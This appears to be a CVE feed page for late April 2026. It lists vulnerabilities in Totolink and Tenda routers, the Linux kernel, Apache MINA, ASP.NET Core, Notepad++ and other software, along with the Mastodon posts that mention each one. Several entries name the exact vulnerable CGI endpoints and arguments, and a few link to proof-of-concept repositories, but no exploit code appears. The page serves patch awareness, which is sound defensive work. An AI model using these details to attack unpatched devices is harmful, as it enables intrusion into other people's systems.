A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

offseq@infosec.exchange at 2026-04-28T05:00:28.000Z ##

🛑 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7202). Public exploit available. Restrict remote access & disable WPS until patched! radar.offseq.com/threat/cve-20 #OffSeq #IoTSecurity #vulnerability #CVE20267202

##

thehackerwire@mastodon.social at 2026-04-28T01:43:42.000Z ##

🔴 CVE-2026-7202 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWiFiWpsStart of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument wscDisabled leads to os command injec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7203
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-28T03:31:36

2 posts

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injection. The attack can be launched remotely. The exploit has been made public and could be used.

offseq@infosec.exchange at 2026-04-28T03:30:33.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) suffers from OS command injection (CVE-2026-7203). Remote, unauthenticated attackers can fully compromise affected routers. No patch confirmed — disable remote mgmt & isolate. radar.offseq.com/threat/cve-20 #OffSeq #Vuln #IoTSec

##

thehackerwire@mastodon.social at 2026-04-28T01:43:52.000Z ##

🔴 CVE-2026-7203 - Critical (9.8)

A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setUrlFilterRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os comma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27785
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T00:31:47

1 posts

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

thehackerwire@mastodon.social at 2026-04-28T01:01:01.000Z ##

🟠 CVE-2026-27785 - High (8.8)

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40976
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T00:31:47

1 posts

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the a

thehackerwire@mastodon.social at 2026-04-28T01:00:52.000Z ##

🔴 CVE-2026-40976 - Critical (9.1)

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7160
(8.8 HIGH)

EPSS: 0.29%

updated 2026-04-28T00:31:47

1 posts

A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-27T22:37:48.000Z ##

🟠 CVE-2026-7160 - High (8.8)

A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the function formTracert of the file /boaform/formTracert. Executing a manipulation of the argument datasize can lead to command injection. The attack may be performed fro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7156
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T21:31:12

2 posts

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument HTTP results in os command injection. The attack may be launched remotely. The exploit is now public and may be used.

offseq@infosec.exchange at 2026-04-27T23:00:33.000Z ##

🚨 CRITICAL: Totolink A8000RU (7.1cu.643_b20200521) is vulnerable to OS command injection (CVE-2026-7156, CVSS 9.3). Exploit is public — remote attackers can fully compromise devices. Disable remote mgmt & restrict access now. radar.offseq.com/threat/cve-20 #OffSeq #CVE20267156 #IoTSecurity

##

thehackerwire@mastodon.social at 2026-04-27T21:17:53.000Z ##

🔴 CVE-2026-7156 - Critical (9.8)

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected is the function CsteSystem of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument HTTP results in os command injection. The att...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7151
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T21:31:12

1 posts

A vulnerability was determined in Tenda HG3 2.0. Impacted is the function formUploadConfig of the file /boaform/formIPv6Routing. This manipulation of the argument destNet causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

thehackerwire@mastodon.social at 2026-04-27T21:00:40.000Z ##

🟠 CVE-2026-7151 - High (8.8)

A vulnerability was determined in Tenda HG3 2.0. Impacted is the function formUploadConfig of the file /boaform/formIPv6Routing. This manipulation of the argument destNet causes stack-based buffer overflow. It is possible to initiate the attack re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7153
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T21:31:12

1 posts

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sys_info results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T21:00:05.000Z ##

🔴 CVE-2026-7153 - Critical (9.8)

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The impacted element is the function setMiniuiHomeInfoShow of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sys_in...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-30350
(7.5 HIGH)

EPSS: 0.01%

updated 2026-04-27T21:31:02

1 posts

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

thehackerwire@mastodon.social at 2026-04-27T22:01:02.000Z ##

🟠 CVE-2026-30350 - High (7.5)

An issue in the /store/items/search endpoint of Agent Protocol server commit e9a89f allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31662
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-27T21:30:50

1 posts

In the Linux kernel, the following vulnerability has been resolved: tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements bc_ackers on every inbound group ACK, even when the same member has already acknowledged the current broadcast round. Because bc_ackers is a u16, a duplicate ACK received after the last legitimate ACK wr

thehackerwire@mastodon.social at 2026-04-28T02:22:57.000Z ##

🟠 CVE-2026-31662 - High (7.5)

In the Linux kernel, the following vulnerability has been resolved:

tipc: fix bc_ackers underflow on duplicate GRP_ACK_MSG

The GRP_ACK_MSG handler in tipc_group_proto_rcv() currently decrements
bc_ackers on every inbound group ACK, even when the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-6741
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T20:21:52.070000

1 posts

The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 5.4.1. This is due to a missing authorization check in the execute() method of the connect-customer-to-wp-user ability, which only requires the customer__edit capability granted to the latepoint_agent role by default, without verifying wheth

thehackerwire@mastodon.social at 2026-04-27T21:00:16.000Z ##

🟠 CVE-2026-6741 - High (8.8)

The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 5.4.1. This is due to a missing authorization check in the execute() method of the con...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7152
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T20:21:52.070000

1 posts

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument telnet_enabled leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-27T20:59:56.000Z ##

🔴 CVE-2026-7152 - Critical (9.8)

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setTelnetCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument telnet_enabled leads to os c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31637
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T20:20:48.030000

1 posts

In the Linux kernel, the following vulnerability has been resolved: rxrpc: reject undecryptable rxkad response tickets rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then parses the buffer as plaintext without checking whether crypto_skcipher_decrypt() succeeded. A malformed RESPONSE can therefore use a non-block-aligned ticket length, make the decrypt operation fail, and still d

thehackerwire@mastodon.social at 2026-04-28T03:08:05.000Z ##

🔴 CVE-2026-31637 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

rxrpc: reject undecryptable rxkad response tickets

rxkad_decrypt_ticket() decrypts the RXKAD response ticket and then
parses the buffer as plaintext without checking whether
cry...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31659
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T20:17:17.613000

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: reject oversized global TT response buffers batadv_tt_prepare_tvlv_global_data() builds the allocation length for a global TT response in 16-bit temporaries. When a remote originator advertises a large enough global TT, the TT payload length plus the VLAN header offset can exceed 65535 and wrap before kmalloc(). The

thehackerwire@mastodon.social at 2026-04-28T02:22:48.000Z ##

🔴 CVE-2026-31659 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: reject oversized global TT response buffers

batadv_tt_prepare_tvlv_global_data() builds the allocation length for a
global TT response in 16-bit temporaries. When a ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31657
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-27T20:16:58.960000

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: hold claim backbone gateways by reference batadv_bla_add_claim() can replace claim->backbone_gw and drop the old gateway's last reference while readers still follow the pointer. The netlink claim dump path dereferences claim->backbone_gw->orig and takes claim->backbone_gw->crc_lock without pinning the underlying bac

thehackerwire@mastodon.social at 2026-04-28T01:11:39.000Z ##

🔴 CVE-2026-31657 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: hold claim backbone gateways by reference

batadv_bla_add_claim() can replace claim->backbone_gw and drop the old
gateway's last reference while readers still follow ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31656
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:16:43.370000

1 posts

In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat A use-after-free / refcount underflow is possible when the heartbeat worker and intel_engine_park_heartbeat() race to release the same engine->heartbeat.systole request. The heartbeat worker reads engine->heartbeat.systole and calls i915_request_put() on it when

thehackerwire@mastodon.social at 2026-04-28T01:11:29.000Z ##

🟠 CVE-2026-31656 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

drm/i915/gt: fix refcount underflow in intel_engine_park_heartbeat

A use-after-free / refcount underflow is possible when the heartbeat
worker and intel_engine_park_heartbeat() ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31652
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:16:12.663000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm/damon/stat: deallocate damon_call() failure leaking damon_ctx damon_stat_start() always allocates the module's damon_ctx object (damon_stat_context). Meanwhile, if damon_call() in the function fails, the damon_ctx object is not deallocated. Hence, if the damon_call() is failed, and the user writes Y to “enabled” again, the

thehackerwire@mastodon.social at 2026-04-28T03:07:56.000Z ##

🟠 CVE-2026-31652 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm/damon/stat: deallocate damon_call() failure leaking damon_ctx

damon_stat_start() always allocates the module's damon_ctx object
(damon_stat_context). Meanwhile, if damon_cal...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31650
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:14:35.180000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mmc: vub300: fix use-after-free on disconnect The vub300 driver maintains an explicit reference count for the controller and its driver data and the last reference can in theory be dropped after the driver has been unbound. This specifically means that the controller allocation must not be device managed as that can lead to use

thehackerwire@mastodon.social at 2026-04-28T03:00:21.000Z ##

🟠 CVE-2026-31650 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mmc: vub300: fix use-after-free on disconnect

The vub300 driver maintains an explicit reference count for the
controller and its driver data and the last reference can in theory...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31649
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T20:13:49.587000

1 posts

In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix integer underflow in chain mode The jumbo_frm() chain-mode implementation unconditionally computes len = nopaged_len - bmax; where nopaged_len = skb_headlen(skb) (linear bytes only) and bmax is BUF_SIZE_8KiB or BUF_SIZE_2KiB. However, the caller stmmac_xmit() decides to invoke jumbo_frm() based on skb->le

thehackerwire@mastodon.social at 2026-04-28T03:00:11.000Z ##

🔴 CVE-2026-31649 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

net: stmmac: fix integer underflow in chain mode

The jumbo_frm() chain-mode implementation unconditionally computes

len = nopaged_len - bmax;

where nopaged_len = skb_headl...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31648
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:13:14.333000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mm: filemap: fix nr_pages calculation overflow in filemap_map_pages() When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I encountered some very strange crash issues showing up as "Bad page state": " [ 734.496287] BUG: Bad page state in process stress-ng-env pfn:415735fb [ 734.496427] page: refcount:0 mapcount:

thehackerwire@mastodon.social at 2026-04-28T03:00:01.000Z ##

🟠 CVE-2026-31648 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

mm: filemap: fix nr_pages calculation overflow in filemap_map_pages()

When running stress-ng on my Arm64 machine with v7.0-rc3 kernel, I
encountered some very strange crash issu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31669
(9.8 CRITICAL)

EPSS: 0.07%

updated 2026-04-27T20:09:25.553000

1 posts

In the Linux kernel, the following vulnerability has been resolved: mptcp: fix slab-use-after-free in __inet_lookup_established The ehash table lookups are lockless and rely on SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability during RCU read-side critical sections. Both tcp_prot and tcpv6_prot have their slab caches created with this flag via proto_register(). However, MPTCP's mptcp_su

thehackerwire@mastodon.social at 2026-04-28T01:11:18.000Z ##

🔴 CVE-2026-31669 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

mptcp: fix slab-use-after-free in __inet_lookup_established

The ehash table lookups are lockless and rely on
SLAB_TYPESAFE_BY_RCU to guarantee socket memory stability
during RCU...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31668
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T20:08:54.307000

1 posts

In the Linux kernel, the following vulnerability has been resolved: seg6: separate dst_cache for input and output paths in seg6 lwtunnel The seg6 lwtunnel uses a single dst_cache per encap route, shared between seg6_input_core() and seg6_output_core(). These two paths can perform the post-encap SID lookup in different routing contexts (e.g., ip rules matching on the ingress interface, or VRF tab

thehackerwire@mastodon.social at 2026-04-28T01:01:12.000Z ##

🔴 CVE-2026-31668 - Critical (9.8)

In the Linux kernel, the following vulnerability has been resolved:

seg6: separate dst_cache for input and output paths in seg6 lwtunnel

The seg6 lwtunnel uses a single dst_cache per encap route, shared
between seg6_input_core() and seg6_output_...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31667
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:00:40.187000

1 posts

In the Linux kernel, the following vulnerability has been resolved: Input: uinput - fix circular locking dependency with ff-core A lockdep circular locking dependency warning can be triggered reproducibly when using a force-feedback gamepad with uinput (for example, playing ELDEN RING under Wine with a Flydigi Vader 5 controller): ff->mutex -> udev->mutex -> input_mutex -> dev->mutex -> ff->m

thehackerwire@mastodon.social at 2026-04-28T00:15:26.000Z ##

🟠 CVE-2026-31667 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

Input: uinput - fix circular locking dependency with ff-core

A lockdep circular locking dependency warning can be triggered
reproducibly when using a force-feedback gamepad with...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31666
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:00:27.157000

1 posts

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref() After commit 1618aa3c2e01 ("btrfs: simplify return variables in lookup_extent_data_ref()"), the err and ret variables were merged into a single ret variable. However, when btrfs_next_leaf() returns 0 (success), ret is overwritten from -ENOENT to 0.

thehackerwire@mastodon.social at 2026-04-28T00:15:16.000Z ##

🟠 CVE-2026-31666 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

btrfs: fix incorrect return value after changing leaf in lookup_extent_data_ref()

After commit 1618aa3c2e01 ("btrfs: simplify return variables in
lookup_extent_data_ref()"), the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31665
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T20:00:05.430000

1 posts

In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: fix use-after-free in timeout object destroy nft_ct_timeout_obj_destroy() frees the timeout object with kfree() immediately after nf_ct_untimeout(), without waiting for an RCU grace period. Concurrent packet processing on other CPUs may still hold RCU-protected references to the timeout object obtained via rcu

thehackerwire@mastodon.social at 2026-04-28T00:15:04.000Z ##

🟠 CVE-2026-31665 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nft_ct: fix use-after-free in timeout object destroy

nft_ct_timeout_obj_destroy() frees the timeout object with kfree()
immediately after nf_ct_untimeout(), without w...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40372
(9.1 CRITICAL)

EPSS: 0.03%

updated 2026-04-27T19:57:39.360000

2 posts

Improper verification of cryptographic signature in ASP.NET Core allows an unauthorized attacker to elevate privileges over a network.

adulau@infosec.exchange at 2026-04-28T05:41:08.000Z ##

The diversity of advisory is key. Look at how good the advisory of GitHub is compared to the others.

db.gcve.eu/vuln/cve-2026-40372

#cve #vulnerability #vulnerabilitymanagement

##

hackmag@infosec.exchange at 2026-04-28T04:30:02.000Z ##

⚪️ Microsoft Issues Emergency Patch for Critical ASP.NET Vulnerability

🗨️ Microsoft has released an out-of-band update for ASP.NET Core. The patch fixes a critical vulnerability in the Data Protection cryptographic APIs that allowed unauthenticated attackers to obtain SYSTEM privileges by forging authentication cookies. The vulnerability is tracked as CVE-2026-40372 and…

🔗 hackmag.com/news/asp-net-patch

#news

##

CVE-2026-42039
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-27T19:50:46.320000

1 posts

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a RangeError. This vulnerability is fixed in 1.15.1 and 0.31.1.

thehackerwire@mastodon.social at 2026-04-27T23:06:11.000Z ##

🟠 CVE-2026-42039 - High (7.5)

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, toFormData recursively walks nested objects with no depth limit, so a deeply nested value passed as request data crashes the Node.js process with a Range...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-30352
(9.8 CRITICAL)

EPSS: 0.27%

updated 2026-04-27T19:18:46.690000

1 posts

A remote code execution (RCE) vulnerability in the /devserver/start endpoint of leonvanzyl autocoder commit 79d02a allows attackers to execute arbitrary code via providing a crafted command parameter.

thehackerwire@mastodon.social at 2026-04-27T16:43:10.000Z ##

🔴 CVE-2026-30352 - Critical (9.8)

A remote code execution (RCE) vulnerability in the /devserver/start endpoint of leonvanzyl autocoder commit 79d02a allows attackers to execute arbitrary code via providing a crafted command parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41635
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

2 posts

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed. The fix checks if the class is present in the accepted class filter before calling Class.forName().  Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0

Matchbook3469@mastodon.social at 2026-04-28T17:52:31.000Z ##

🚨 New security advisory:

CVE-2026-41635 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#InfoSec #VulnerabilityManagement #CyberSec

##

thehackerwire@mastodon.social at 2026-04-27T22:01:21.000Z ##

🔴 CVE-2026-41635 - Critical (9.8)

Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them (for static classes or primitive types) does not check the class at all, bypassing the classname allowlist and allowing arbitrary code to be executed.

The fix che...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5942
(5.5 MEDIUM)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

Flaws in page lifecycle management allow document structure changes to desynchronize internal component states, causing subsequent operations to access invalidated objects and crash the program.

netsecio@mastodon.social at 2026-04-28T16:41:30.000Z ##

📰 Foxit PDF Reader Flaw (CVE-2026-5942) Could Lead to Information Disclosure

📄 Foxit PDF Reader users: A use-after-free flaw (CVE-2026-5942) has been disclosed. It can leak sensitive info and requires opening a malicious file. A patch is available. #Foxit #Vulnerability #CyberSecurity #PatchNow

🔗 cyber.netsecops.io

##

CVE-2026-41409
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

2 posts

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been executed. Affected versions are Apache MINA 2.0.0 <= 2.0.27, 2.1.0 <= 2.1.10, and 2.2.0 <= 2.2.5. The problem is resolved in Apache MINA 2.0.28, 2.1.

Matchbook3469@mastodon.social at 2026-04-28T16:24:49.000Z ##

🔴 New security advisory:

CVE-2026-41409 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #PatchNow #InfoSecCommunity

##

thehackerwire@mastodon.social at 2026-04-27T10:29:10.000Z ##

🔴 CVE-2026-41409 - Critical (9.8)

The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incomplete. The classname allowlist of classes allowed to be deserialized was applied too late after a static initializer in a class to be read might already have been exec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-3008
(6.6 MEDIUM)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

Successful exploitation of the string injection vulnerability could allow an attacker to obtain memory address information or crash the application.

3 repos

https://github.com/llgsjsm/cve-2026-3008

https://github.com/rakeshelamaran98/CVE-2026-30081

https://github.com/Cr0wld3r/CVE-2026-30082

beyondmachines1@infosec.exchange at 2026-04-28T13:01:28.000Z ##

Notepad++ Patches Critical Format String Injection Flaw

Notepad++ version 8.9.4 patches a critical format string injection vulnerability (CVE-2026-3008) that allow attackers to crash the application or leak sensitive memory data via malicious language packs.

**If you use Notepad++, update to version 8.9.4 immediately through the official website or built-in updater, especially if you use a non-English language pack. Only download language packs from the official Notepad++ source, never from forums or third-party sites.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2025-69689
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

The Fan Control application V251 contains an improper privilege handling vulnerability in its Open File Dialog. The dialog processes user-supplied paths with elevated permissions, which can be exploited by a local attacker to perform actions with administrator-level privileges.

thehackerwire@mastodon.social at 2026-04-27T21:00:50.000Z ##

🟠 CVE-2025-69689 - High (8.8)

The Fan Control application V251 contains an improper privilege handling vulnerability in its Open File Dialog. The dialog processes user-supplied paths with elevated permissions, which can be exploited by a local attacker to perform actions with ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7100
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A flaw has been found in Tenda F456 1.0.0.5. The impacted element is the function fromNatlimitof of the file /goform/Natlimit of the component httpd. Executing a manipulation can lead to buffer overflow. The attack may be launched remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-27T17:00:40.000Z ##

🟠 CVE-2026-7100 - High (8.8)

A flaw has been found in Tenda F456 1.0.0.5. The impacted element is the function fromNatlimitof of the file /goform/Natlimit of the component httpd. Executing a manipulation can lead to buffer overflow. The attack may be launched remotely. The ex...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7099
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T18:57:20.293000

1 posts

A vulnerability was detected in Tenda F456 1.0.0.5. The affected element is the function formQuickIndex of the file /goform/QuickIndex of the component httpd. Performing a manipulation of the argument mit_linktype results in buffer overflow. The attack may be initiated remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-27T16:01:12.000Z ##

🟠 CVE-2026-7099 - High (8.8)

A vulnerability was detected in Tenda F456 1.0.0.5. The affected element is the function formQuickIndex of the file /goform/QuickIndex of the component httpd. Performing a manipulation of the argument mit_linktype results in buffer overflow. The a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5943
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

Document structural anomalies caused inconsistencies between page element relationships and internal index states. When scripts triggered document modifications, object reference validity was not properly maintained, leading to a crash when accessing an invalid pointer during page information queries.

thehackerwire@mastodon.social at 2026-04-27T15:01:03.000Z ##

🟠 CVE-2026-5943 - High (7.8)

Document structural anomalies caused inconsistencies between page element relationships and internal index states. When scripts triggered document modifications, object reference validity was not properly maintained, leading to a crash when access...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5940
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T18:57:20.293000

1 posts

Calling a function that triggers a UI refresh after removing comments via a script may access an invalidated object, leading to program crashes.

thehackerwire@mastodon.social at 2026-04-27T15:00:42.000Z ##

🟠 CVE-2026-5940 - High (7.8)

Calling a function that triggers a UI refresh after removing comments via a script may access an invalidated object, leading to program crashes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7119
(8.8 HIGH)

EPSS: 0.29%

